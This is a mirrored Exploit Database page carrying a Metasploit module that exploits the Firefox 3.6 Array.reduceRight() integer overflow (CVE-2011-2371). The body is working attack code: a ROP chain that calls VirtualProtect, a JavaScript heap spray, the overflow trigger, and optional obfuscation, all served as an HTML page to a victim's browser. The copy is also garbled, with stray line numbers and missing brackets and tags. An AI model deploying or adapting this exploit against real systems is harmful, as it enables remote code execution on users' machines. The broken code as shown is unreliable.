Mozilla Firefox – ‘Array.reduceRight()’ Integer Overflow (Metasploit) (2)

Exploit Database
109 阅读

作者： Metasploit

日期： 2011-10-13
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/17976/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

# $Id: mozilla_reduceright.rb 13909 2011-10-13 03:16:15Z sinn3r $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = AverageRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info={})

super(update_info(info,

'Name' => "Mozilla Firefox Array.reduceRight() Integer Overflow",

'Description'=> %q{

This module exploits a vulnerability found in Mozilla Firefox 3.6. When an

array object is configured with a large length value, the reduceRight() method

may cause an invalid index being used, allowing abitrary remote code execution.

Please note that the exploit requires a longer amount of time (compare to a

typical browser exploit) in order to gain control of the machine.

'License'=> MSF_LICENSE,

'Version'=> "$Revision: 13909 $",

'Author' =>

[

'Chris Rohlf',#Matasano Security (Initial discovery according to Mozilla.org)

'Yan Ivnitskiy',#Matasano Security (Initial discovery with Chris?)

'Matteo Memelli', #PoC from Exploit-DB

'dookie2000ca', #"Helping" ryujin (Matteo)

'sinn3r', #Metasploit

'References' =>

[

['CVE', '2011-2371'],

['URL', 'http://http://www.exploit-db.com/exploits/17974/'],

['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=664009']

'Payload'=>

{

'BadChars'=> "\x00",

'PrependEncoder'=> "\xbc\x0c\x0c\x0c\x0c",

'DefaultOptions'=>

{

'ExitFunction' => "process",

'InitialAutoRunScript' => 'migrate -f',

'Platform' => 'win',

'Targets'=>

[

#Windows XP / Vista / 7

[ 'Mozilla Firefox 3.6.16', {} ],

'Privileged' => false,

'DisclosureDate' => "Jun 21 2011",

'DefaultTarget'=> 0

))

register_options(

[

OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])

], self.class)

end

def junk

return rand_text_alpha(4).unpack("L")[0].to_i

end

def on_request_uri(cli, request)

agent = request.headers['User-Agent']

if agent !~ /Firefox\/3\.6\.[16|17]/

vprint_error("This browser is not supported: #{agent.to_s}")

send_not_found(cli)

return

end

#mona.py tekniq! + Payload

rop = [

0x7c346c0a,# POP EAX # RETN (MSVCR71.dll)

0x7c37a140,# Make EAX readable

0x7c37591f,# PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)

0x7c348b06,# EBP (NOP)

0x7c346c0a,# POP EAX # RETN (MSVCR71.dll)

0x7c37a140,# <- VirtualProtect() found in IAT

0x7c3530ea,# MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)

0x7c346c0b,# Slide, so next gadget would write to correct stack location

0x7c376069,# MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)

0x7c348b06,# EDI (filler)

0x7c348b06,# will be patched at runtime (VP), then picked up into ESI

0x7c348b06,# EBX (filler)

0x7c376402,# POP EBP # RETN (msvcr71.dll)

0x7c345c30,# ptr to push esp #ret(from MSVCR71.dll)

0x7c346c0a,# POP EAX # RETN (MSVCR71.dll)

0xfffff82f,# size 20001 bytes

0x7c351e05,# NEG EAX # RETN (MSVCR71.dll)

0x7c354901,# POP EBX # RETN (MSVCR71.dll)

0xffffffff,# pop value into ebx

0x7c345255,# INC EBX # FPATAN # RETN (MSVCR71.dll)

0x7c352174,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)

0x7c34d201,# POP ECX # RETN (MSVCR71.dll)

0x7c38b001,# RW pointer (lpOldProtect) (-> ecx)

0x7c34b8d7,# POP EDI # RETN (MSVCR71.dll)

0x7c34b8d8,# ROP NOP (-> edi)

0x7c344f87,# POP EDX # RETN (MSVCR71.dll)

0xffffffc0,# value to negate, target value : 0x00000040, target: edx

0x7c351eb1,# NEG EDX # RETN (MSVCR71.dll)

0x7c346c0a,# POP EAX # RETN (MSVCR71.dll)

0x90909090,# NOPS (-> eax)

0x7c378c81,# PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)

].pack('V*')

table = [0x4141].pack('v*')

table << [

0x0c000048,

junk,

].pack('V*')

table << [0x4141].pack('v*')

table << [

0x7c370eef,

junk,

].pack('V*')

table << [0x4141].pack('v*')

table << [

0x3410240c,

0x0c00007c,

junk,

0x0c00002e

].pack('V*')

p = payload.encoded

arch = Rex::Arch.endian(target.arch)

js_payload = Rex::Text.to_unescape(rop + p, arch)

js_ptrs= Rex::Text.to_unescape(table, arch)

#Pretty much based on Matteo's code except for the size adjustment to avoid a busted heap

js = <<-JS

var applet = document.getElementById('MyApplet');

function spray() {

var ptrs = unescape("#{js_ptrs}");

var bheader= 0x12/2;

var nullt= 0x2/2;

var espoffset= (7340 /2) - ptrs.length;

var esppadding = unescape("%u0c0c%u0c0c");

while(esppadding.length < espoffset) esppadding += esppadding;

esppadding = esppadding.substring(0, espoffset);

var payload = unescape("#{js_payload}");

var tr_padding = unescape("%u0c0c%u0c0c");

while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}

var dummy = ptrs + esppadding + payload + tr_padding;

var hspray = dummy.substring(0,0x7fa00 - bheader - nullt);

HeapBlocks = new Array()

for (i=0;i<0x60;i++){

HeapBlocks[i] += hspray;

}

spray();

obj = new Array;

obj.length = 2197815302;

f = function trigger(prev, myobj, indx, array) {

alert(myobj[0]);

}

obj.reduceRight(f,1,2,3);

js = js.gsub(/^\t\t/, '')

if datastore['OBFUSCATE']

js = ::Rex::Exploitation::JSObfu.new(js)

js.obfuscate

end

html = <<-HTML

<html>

<head>

</head>

<body>

You need a Java-enabled browser to pwn this.

</APPLET>

#{js}

</script>

</body>

<html>

HTML

print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

send_response(cli, html, {'Content-Type'=>'text/html'})

end